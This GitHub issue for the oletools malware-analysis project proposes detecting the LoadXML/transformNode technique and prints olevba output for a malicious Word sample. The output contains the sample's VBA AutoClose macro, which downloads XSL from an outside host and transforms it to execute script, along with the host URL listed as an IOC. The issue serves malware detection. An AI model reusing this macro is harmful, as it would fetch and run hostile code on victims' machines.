Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

olevba, mraptor: add keywords LoadXML/transformNode for XSL to script #851

Open
decalage2 opened this issue Mar 27, 2024 · 1 comment
Open

olevba, mraptor: add keywords LoadXML/transformNode for XSL to script #851

decalage2 opened this issue Mar 27, 2024 · 1 comment
Assignees
@decalage2
Labels
mraptor olevba 👍 enhancement
Milestone
Next Release

Comments

@decalage2
Copy link
Owner

decalage2 commented Mar 27, 2024
edited
Loading

Several recent samples use LoadXML and transformNode methods (on a MSXML2.DomDocument COM object) to apply an XSL stylesheet to XML data and obtain a malicious JavaScript which seems to be executed automatically:

transformNode: https://learn.microsoft.com/en-us/previous-versions/windows/desktop/ms761399(v=vs.85)

more info:

$ olevba bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc 
olevba 0.60.1 on Python 3.11.6 - http://decalage.info/python/oletools
===============================================================================
FILE: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls 
in file: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc - OLE stream: 'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas 
in file: bbdbcec62526b94b38d7ab4e0e794efcc363cd7ec033f39c543c666378c317ea.doc - OLE stream: 'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub AUtoclose()
Set Document = CreateObject("MSXML2.DomDocument")
Set dOcuMeNtXMl = CreateObject("MSXML2.xmlhttp")
Document.async = 0
With dOcuMeNtXMl
.Open "get", "https://adfhjiuyqnmahdfiuad.com/index.php", False
.senD
End With
Document.LoadXML dOcuMeNtXMl.responseText
Document.tRAnsformnode Document
End Sub
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |AUtoclose           |Runs when the Word document is closed        |
|Suspicious|Open                |May open a file                              |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|MSXML2.xmlhttp      |May download files from the Internet         |
|IOC       |https://adfhjiuyqnma|URL                                          |
|          |hdfiuad.com/index.ph|                                             |
|          |p                   |                                             |
+----------+--------------------+---------------------------------------------+
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@decalage2 decalage2

Labels
mraptor olevba 👍 enhancement
Projects
None yet
Milestone
Next Release
Development

No branches or pull requests
1 participant
@decalage2